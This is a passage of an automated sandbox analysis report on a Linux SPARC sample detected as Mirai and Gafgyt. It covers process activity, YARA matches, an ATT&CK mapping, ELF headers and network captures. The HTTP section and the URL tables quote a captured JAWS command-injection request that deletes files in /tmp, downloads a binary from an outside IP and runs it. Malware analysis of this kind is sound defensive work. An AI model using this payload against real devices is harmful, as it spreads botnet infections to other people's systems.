      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/788/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/789/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/789/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/904/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/904/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5275)File opened: /proc/1207/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/5382/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/5263/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4450/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4450/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4450/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/5144/exe
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4331/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4331/fd
      Source: /tmp/SLdtSSVlj2 (PID: 5269)File opened: /proc/4331/exe
      Source: /usr/bin/whoopsie (PID: 5321)Directory: /nonexistent/.cache
      Source: /usr/sbin/rsyslogd (PID: 5323)Log file created: /var/log/kern.log

      Hooking and other Techniques for Hiding and Protection:

      Uses known network protocols on non-standard ports
      Source: unknown Network traffic detected: HTTP traffic on port 49312 -> 60001
      Source: unknown Network traffic detected: HTTP traffic on port 60001 -> 49312
      Source: /tmp/SLdtSSVlj2 (PID: 5267)Queries kernel information via 'uname'
      Source: /usr/sbin/rsyslogd (PID: 5323)Queries kernel information via 'uname'
      Source: /lib/systemd/systemd-journald (PID: 5325)Queries kernel information via 'uname'
      Source: SLdtSSVlj2, 5267.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/sparc
      Source: SLdtSSVlj2, 5267.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-sparc/tmp/SLdtSSVlj2SUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/SLdtSSVlj2
      Source: SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: /usr/bin/vmtoolsd
      Source: SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: /sparc/0 /proc/224/exemt/sparc/p!/proc/796/fd/4/sparc/p1/usr/bin/vmtoolsdparc/u-binfmt0!/proc/225/exe!/proc/796/fd/3/sparc/p1u-binfmt/sparc/Q=
      Source: SLdtSSVlj2, 5267.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000010e50a8.00000000cdf312d3.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000010e50a8.00000000cdf312d3.rw-.sdmpBinary or memory string: FV!/etc/qemu-binfmt/sparc
      Source: syslog.27.drBinary or memory string: Jan 15 00:45:13 galassia kernel: [ 422.084114] Modules linked in: monitor(OE) md4 cmac cifs libarc4 fscache libdes vmw_vsock_vmci_transport vsock binfmt_misc dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua vmw_balloon joydev input_leds serio_raw vmw_vmci sch_fq_codel drm parport_pc ppdev lp parport ip_tables x_tables autofs4 btrfs zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel crypto_simd cryptd glue_helper psmouse ahci mptspi vmxnet3 scsi_transport_spi mptscsih libahci mptbase
      Source: SLdtSSVlj2, 5267.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5270.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5271.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5275.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5276.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5279.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmp, SLdtSSVlj2, 5280.1.00000000d0e1d6b7.00000000f3d7335d.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
      Source: syslog.27.drBinary or memory string: Jan 15 00:45:13 galassia kernel: [ 422.084164] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 12/12/2018

      Stealing of Sensitive Information:

      Yara detected Mirai
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Yara detected Gafgyt
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY

      Remote Access Functionality:

      Yara detected Mirai
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Yara detected Gafgyt
      Source: Yara matchFile source: SLdtSSVlj2, type: SAMPLE
      Source: Yara matchFile source: 5275.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5267.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5279.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5270.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5271.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5276.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY
      Source: Yara matchFile source: 5280.1.000000006c68effe.00000000ecbc2867.r-x.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
      | Valid Accounts | Windows Management Instrumentation | Path Interception | Path Interception | Hidden Files and Directories 1 | OS Credential Dumping 1 | Security Software Discovery 11 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
      | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | File and Directory Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Standard Port 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
      | Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | System Information Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
      | Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 3 | SIM Card Swap | | Carrier Billing Fraud |
      | Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | Ingress Tool Transfer 3 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings |

      Malware Configuration

      No configs have been found

      Behavior Graph

      [Behavior graph: ID 553479, Sample: SLdtSSVlj2, Startdate: 15/01/2022, Architecture: LINUX, Score: 100]

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      | Source | Detection | Scanner | Label | Link |
      | SLdtSSVlj2 | 53% | Virustotal | | Browse |
      | SLdtSSVlj2 | 63% | ReversingLabs | Linux.Trojan.Mirai | |

      Dropped Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      | Source | Detection | Scanner | Label | Link |
      | http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws | 0% | Avira URL Cloud | safe | |

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      | Name | Malicious | Antivirus Detection | Reputation |
      | http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws | false | Avira URL Cloud: safe | unknown |

      Contacted IPs


      Public


      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASN

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      /var/lib/whoopsie/whoopsie-id.02WAG1
      Process:/usr/bin/whoopsie
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):128
      Entropy (8bit):3.9410969045919657
      Encrypted:false
      SSDEEP:3:19y6UTAvBTdDVEQcNgAT0XUQhd3tjCZccCKcsVQWQ7JW:3y6BlVEfQXU8djCZd40
      MD5:D2B5AAF22916F8D6665CF9E835EAD5E7
      SHA1:AAEF3CE527B8F1E3733BCD03EF7A6C0F30881E15
      SHA-256:FEB925D4465BF6D30A42B19112406AD1B59BA90673DC4F91B25005A90FEFEB36
      SHA-512:B55A45FA0DECE5A3B0348BC3F3031A7329590E57BAD5013690AFEAA9825C0DE4B75D27057A56C33800F1626935840DA2262AAF14E795C75F39362B728D95F18A
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: 9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e
      /var/log/journal/ee49dfd4fa47433baee88884e2d7de7c/system.journal
      Process:/lib/systemd/systemd-journald
      File Type:data
      Category:dropped
      Size (bytes):240
      Entropy (8bit):1.448047321524811
      Encrypted:false
      SSDEEP:3:F31HliKvW/2kl/kKvW/28t:F382Mq2
      MD5:1F60EDD49E4CC1F1C0792598C47673FA
      SHA1:4C16C1F5A759EB4FDBE7B01AD2ED803ED9A4BFBE
      SHA-256:26B3CA0968676A85209D40A14518C6575107A98B9C8A221A4944C8CBED9E1C84
      SHA-512:EBDCE2356260F4A23891661120C8F9059981B30A77DE3BD45374CFBF4EF481489E3F3BF3B70CBFC342EF6976668F2C8AFB0627087490C19DA6FFA26EFB2B7861
      Malicious:false
      Reputation:low
      Preview: LPKSHHRH..................Y..>Jn.....S.%..................................Y..>Jn.....S.%........................................................................................................................................................
      /var/log/kern.log
      Process:/usr/sbin/rsyslogd
      File Type:ASCII text, with very long lines
      Category:dropped
      Size (bytes):6846
      Entropy (8bit):5.002979720194877
      Encrypted:false
      SSDEEP:96:vqXAOy+f2Be+4Dv0qRWOr8Mohr0BYHOq02IFgMB4igbEjSOf3eBiqqI5VOSPNpvV:Slr8+2Oc489CUR1VzbXw76lix4Rf
      MD5:B9F6472066B066D02172E7FF077E33E6
      SHA1:0039EA72C2CAA81875220FDA6C7B9F68E9FCBFBA
      SHA-256:437A5CC5B4FFEA465AFA4917112703FF39623CF0C5BEBB3C1C6057E540C35E66
      SHA-512:33ACE561E4A1E24A1D933CBB84C0C062EB6252C47A233EF347DA62CDF0ED5358390B1AFAC6C4B6B5811CBBB45DF21A3F7FDE73593CBFD017B7A585BCD5BE3823
      Malicious:false
      Reputation:low
      Preview: Jan 15 00:45:13 galassia kernel: [ 421.001790] blocking signal 9: 5275 -> 797.Jan 15 00:45:13 galassia kernel: [ 421.501666] blocking signal 9: 5275 -> 936.Jan 15 00:45:13 galassia kernel: [ 421.613716] blocking signal 9: 5275 -> 1320.Jan 15 00:45:13 galassia kernel: [ 421.641574] blocking signal 9: 5275 -> 1334.Jan 15 00:45:13 galassia kernel: [ 421.663883] blocking signal 9: 5275 -> 1335.Jan 15 00:45:13 galassia kernel: [ 421.717290] blocking signal 9: 5275 -> 1389.Jan 15 00:45:13 galassia kernel: [ 421.940054] blocking signal 9: 5275 -> 1809.Jan 15 00:45:13 galassia kernel: [ 421.963486] blocking signal 9: 5275 -> 1860.Jan 15 00:45:13 galassia kernel: [ 421.986779] blocking signal 9: 5275 -> 1872.Jan 15 00:45:13 galassia kernel: [ 422.025092] blocking signal 9: 5275 -> 1983.Jan 15 00:45:13 galassia kernel: [ 422.084078] ------------[ cut here ]------------.Jan 15 00:45:13 galassia kernel: [ 422.084080] kernel_write_unchecked failed with: -512.Jan 15 00:45:13 galassia ker
      /var/log/syslog
      Process:/usr/sbin/rsyslogd
      File Type:ASCII text, with very long lines
      Category:dropped
      Size (bytes):10480
      Entropy (8bit):5.088105719006059
      Encrypted:false
      SSDEEP:192:SIWer8+2Oca89CUR1VzbXw76lix4EuR7qS0z8+bn9NuvBc0m7+T:cAMOca89CUR1V/Xw76lix4EuR7qS0z8F
      MD5:8B294A410842F553E7CD8ACACF921685
      SHA1:27011FBC6B8F3310370F33D1D447E81420FB0146
      SHA-256:15942910CC4EF577C8F7A7C58BC96EEDF31DE38D70511B66C090335562F6DC40
      SHA-512:29247114A51E64C2307DC7B22BE783E771A82CC503E5D1C5A93719D50BD3DB6BCACBE39F57D71EA56EF8C18345A8978F2DD42A16903DFA1FF4F755951F12094D
      Malicious:false
      Reputation:low
      Preview: Jan 15 00:45:13 galassia kernel: [ 420.866175] systemd[1]: rsyslog.service: Main process exited, code=killed, status=9/KILL.Jan 15 00:45:13 galassia kernel: [ 420.866288] systemd[1]: rsyslog.service: Failed with result 'signal'..Jan 15 00:45:13 galassia kernel: [ 421.001790] blocking signal 9: 5275 -> 797.Jan 15 00:45:13 galassia kernel: [ 421.075601] systemd[1]: rsyslog.service: Scheduled restart job, restart counter is at 1..Jan 15 00:45:13 galassia kernel: [ 421.075622] systemd[1]: Stopped System Logging Service..Jan 15 00:45:13 galassia kernel: [ 421.077046] systemd[1]: Starting System Logging Service....Jan 15 00:45:13 galassia kernel: [ 421.501666] blocking signal 9: 5275 -> 936.Jan 15 00:45:13 galassia kernel: [ 421.613716] blocking signal 9: 5275 -> 1320.Jan 15 00:45:13 galassia kernel: [ 421.641574] blocking signal 9: 5275 -> 1334.Jan 15 00:45:13 galassia kernel: [ 421.663883] blocking signal 9: 5275 -> 1335.Jan 15 00:45:13 galassia kernel: [ 421.717290] blocking si

      Static File Info

      General

      File type:ELF 32-bit MSB executable, SPARC, version 1 (SYSV), statically linked, stripped
      Entropy (8bit):6.137666783957336
      TrID:
      • ELF Executable and Linkable format (generic) (4004/1) 100.00%
      File name:SLdtSSVlj2
      File size:87664
      MD5:6b355f508658f7fbe9c91fad5d09d6b5
      SHA1:72a9d43e568016e0384a39e391391498695328bd
      SHA256:9010857d2724b141fc1ccc742e9d5d41ff50e102878d196fd9726458b0864c19
      SHA512:a9cab0b7fd2ff29f3e5d585d504f4ca2d991dff56829fde45695c819a57e7f9a5afb3ebe8e6e84ba3f75022006c216dbe405a80af33f3e75504f4c2fba4114e4
      SSDEEP:1536:iRbOxiKmmrxvErU5J9JJL4aymGuxwOWPnhIm2K09YZnZSZ55ESUJ:iJOxvlrxsXaywk72KmGZ65WR
      File Content Preview:.ELF...........................4..T......4. ...(......................Rh..Rh..............Rl..Rl..Rl...4............dt.Q................................@..(....@.J.................#.....`...`.....!....."...@.....".........`......$"..."...@...........`....

      Static ELF Info

      ELF header

      Class:ELF32
      Data:2's complement, big endian
      Version:1 (current)
      Machine:Sparc
      Version Number:0x1
      Type:EXEC (Executable file)
      OS/ABI:UNIX - System V
      ABI Version:0
      Entry Point Address:0x101a4
      Flags:0x0
      ELF Header Size:52
      Program Header Offset:52
      Program Header Size:32
      Number of Program Headers:3
      Section Header Offset:87264
      Section Header Size:40
      Number of Section Headers:10
      Header String Table Index:9

      Sections

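      Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
       | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 |  | 0 | 0 | 0
      .init | PROGBITS | 0x10094 | 0x94 | 0x1c | 0x0 | 0x6 | AX | 0 | 0 | 4
      .text | PROGBITS | 0x100b0 | 0xb0 | 0x12ba4 | 0x0 | 0x6 | AX | 0 | 0 | 4
      .fini | PROGBITS | 0x22c54 | 0x12c54 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 4
      .rodata | PROGBITS | 0x22c68 | 0x12c68 | 0x2600 | 0x0 | 0x2 | A | 0 | 0 | 8
      .ctors | PROGBITS | 0x3526c | 0x1526c | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
      .dtors | PROGBITS | 0x35274 | 0x15274 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4
      .data | PROGBITS | 0x35280 | 0x15280 | 0x220 | 0x0 | 0x3 | WA | 0 | 0 | 8
      .bss | NOBITS | 0x354a0 | 0x154a0 | 0x5c8 | 0x0 | 0x3 | WA | 0 | 0 | 8
      .shstrtab | STRTAB | 0x0 | 0x154a0 | 0x3e | 0x0 | 0x0 |  | 0 | 0 | 1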

      Program Segments

      Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
      LOAD | 0x0 | 0x10000 | 0x10000 | 0x15268 | 0x15268 | 3.7159 | 0x5 | R E | 0x10000 |  | .init .text .fini .rodata
      LOAD | 0x1526c | 0x3526c | 0x3526c | 0x234 | 0x7fc | 1.6934 | 0x6 | RW | 0x10000 |  | .ctors .dtors .data .bss
      GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |  | 

      Network Behavior

      Snort IDS Alerts

      Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP

      Network Port Distribution

      TCP Packets

      Timestamp | Source Port | Dest Port | Source IP | Dest IP

      ICMP Packets

      Timestamp | Source IP | Dest IP | Checksum | Code | Type
      Jan 15, 2022 00:45:14.618807077 CET192.168.200.1192.168.2.231df4(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.671499014 CET93.232.183.27192.168.2.23b233(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.672905922 CET87.164.110.18192.168.2.23181(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.688098907 CET93.217.36.213192.168.2.234489(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:14.692800045 CET82.102.80.113192.168.2.237471(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.709109068 CET109.236.95.227192.168.2.23d147(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.760675907 CET69.17.199.233192.168.2.23cb82(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:14.771121025 CET24.142.57.66192.168.2.23e949(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.793824911 CET150.99.189.2192.168.2.231aea(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:14.817384958 CET190.242.149.66192.168.2.231d5f(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:14.855444908 CET192.153.159.60192.168.2.235448(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:14.872111082 CET167.98.212.156192.168.2.233dc2(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:15.541363001 CET217.249.207.119192.168.2.23ffb(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:15.552989006 CET78.10.160.251192.168.2.2386e(Net unreachable)Destination Unreachable
      Jan 15, 2022 00:45:15.672755957 CET2.228.244.70192.168.2.23d00c(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:15.684374094 CET89.247.159.237192.168.2.23cd52(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:15.846555948 CET173.246.228.50192.168.2.23c764(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:15.901298046 CET120.72.94.70192.168.2.2336c6(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:16.001640081 CET41.184.206.6192.168.2.231b62(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:16.677459002 CET84.164.133.84192.168.2.23ed3e(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:16.678903103 CET93.195.173.118192.168.2.23bbfd(Unknown)Destination Unreachable
      Jan 15, 2022 00:45:16.727746964 CET89.106.28.2192.168.2.23216f(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:16.790190935 CET121.120.104.254192.168.2.23ce02(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:16.879790068 CET177.73.40.17192.168.2.2392c6(Time to live exceeded in transit)Time Exceeded
      Jan 15, 2022 00:45:16.911315918 CET93.93.192.114192.168.2.238c70(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:17.660476923 CET148.187.0.220192.168.2.23ead2(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:17.967765093 CET196.240.124.2192.168.2.23c451(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:18.209935904 CET89.180.183.224192.168.2.23b5ac(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:45:18.821820021 CET74.129.242.54192.168.2.2320b5(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:19.543643951 CET212.111.1.76192.168.2.23acc4(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:19.830214024 CET64.156.97.18192.168.2.232493(Host unreachable)Destination Unreachable
      Jan 15, 2022 00:45:29.553349972 CET192.168.2.23192.168.2.18283(Port unreachable)Destination Unreachable
      Jan 15, 2022 00:46:49.582129002 CET192.168.2.23192.168.2.18283(Port unreachable)Destination Unreachable

      HTTP Request Dependency Graph

      • 127.0.0.1:80

      HTTP Packets

      Session ID:0
      Source IP:192.168.2.23
      Source Port:49312
      Destination IP:217.88.122.189
      Destination Port:60001

      Timestamp:Jan 15, 2022 00:45:09.575633049 CET
      kBytes transferred:209
      Direction:OUT
      Data:
      GET /shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws HTTP/1.1
      User-Agent: Hello, world
      Host: 127.0.0.1:80
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
      Connection: keep-alive

      Timestamp:Jan 15, 2022 00:45:09.618828058 CET
      kBytes transferred:210
      Direction:IN
      Data:
      HTTP/1.1 404 Not Found
      Server: JAWS/1.0 Jan 21 2017
      Content-Type: text/html; charset=UTF-8
      Content-length: 213


      System Behavior

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:/tmp/SLdtSSVlj2
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:02
      Start date:15/01/2022
      Path:/tmp/SLdtSSVlj2
      Arguments:n/a
      File size:4379400 bytes
      MD5 hash:7dc1c0e23cd5e102bb12e5c29403410e

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/lib/systemd/systemd
      Arguments:n/a
      File size:1620224 bytes
      MD5 hash:9b2bec7092a40488108543f9334aab75

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/bin/journalctl
      Arguments:/usr/bin/journalctl --smart-relinquish-var
      File size:80120 bytes
      MD5 hash:bf3a987344f3bacafc44efd882abda8b

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/lib/systemd/systemd
      Arguments:n/a
      File size:1620224 bytes
      MD5 hash:9b2bec7092a40488108543f9334aab75

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/bin/dbus-daemon
      Arguments:/usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
      File size:249032 bytes
      MD5 hash:3089d47e3f3ab84cd81c48fd406d7a8c

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/lib/systemd/systemd
      Arguments:n/a
      File size:1620224 bytes
      MD5 hash:9b2bec7092a40488108543f9334aab75

      General

      Start time:00:45:11
      Start date:15/01/2022
      Path:/usr/bin/whoopsie
      Arguments:/usr/bin/whoopsie -f
      File size:68592 bytes
      MD5 hash:d3a6915d0e7398fb4c89a037c13959c8

      General

      Start time:00:45:12
      Start date:15/01/2022
      Path:/usr/lib/systemd/systemd
